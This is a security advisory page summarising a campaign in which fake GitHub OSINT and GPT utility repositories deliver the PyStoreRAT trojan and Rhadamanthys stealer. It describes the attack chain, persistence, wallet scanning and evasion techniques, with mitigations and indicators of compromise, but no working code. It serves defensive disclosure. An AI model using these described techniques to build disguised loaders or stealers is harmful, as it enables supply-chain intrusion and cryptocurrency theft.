top of page
perceptive_background_267k.jpg

Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

Published:

12 december 2025 om 18:50:00

Alert date:

12 december 2025 om 20:01:07

Source:

thehackernews.com

Click to open the original link from this advisory

Cybersecurity researchers have identified a new campaign using fake GitHub-hosted Python repositories to distribute PyStoreRAT, a previously undocumented JavaScript-based Remote Access Trojan. The malicious repositories are disguised as development utilities or OSINT tools and contain minimal code that silently downloads and executes remote HTA files. This represents an active supply chain attack targeting developers and security researchers who might download these seemingly legitimate tools from GitHub.

Technical details

PyStoreRAT is a modular, multi-stage JavaScript-based Remote Access Trojan distributed through GitHub repositories containing Python/JavaScript loader stubs. The malware uses fake OSINT tools, DeFi bots, GPT wrappers, and security utilities to target analysts and developers. Attack chain: loader stub downloads remote HTA file → executes via mshta.exe → delivers PyStoreRAT → deploys Rhadamanthys stealer. The malware can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. It establishes persistence via scheduled task disguised as NVIDIA update, profiles systems, checks admin privileges, scans for cryptocurrency wallets (Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02), and implements evasion techniques for CrowdStrike Falcon and Cybereason/ReasonLabs detection.

Mitigation steps:

Monitor for mshta.exe execution patterns, especially when spawned by cmd.exe or executed directly after antivirus detection checks. Watch for scheduled tasks masquerading as legitimate software updates. Implement detection for HTA file downloads and execution. Monitor GitHub repositories with inflated star/fork metrics and minimal functionality. Be cautious of OSINT tools, DeFi bots, and GPT utilities from new or dormant GitHub accounts. Implement behavioral analysis for cryptocurrency wallet file scanning activities.

Affected products:

GitHub repositories
Python applications
JavaScript applications
Windows systems
Ledger Live wallet
Trezor wallet
Exodus wallet
Atomic wallet
Guarda wallet
BitBox02 wallet

Related links:

https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/
https://thehackernews.com/2025/06/67-trojanized-github-repositories-found.html
https://ti.qianxin.com/blog/articles/setcoderat-customized-for-chinese-speaking-regions-en/

Related CVE's:

Related threat actors:

IOC's:

mshta.exe execution, cmd.exe spawning mshta.exe, Scheduled task disguised as NVIDIA app self-update, pnm2png.exe, zlib1.dll, qt.conf, api.bilibili[.]com/x/report/click/now, Russian-language artifacts in code, HTA file downloads, Falcon string checks, Reason string checks

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Deze website toont informatie afkomstig van externe bronnen; Perceptive aanvaardt geen verantwoordelijkheid voor de juistheid, volledigheid of actualiteit van deze informatie.

bottom of page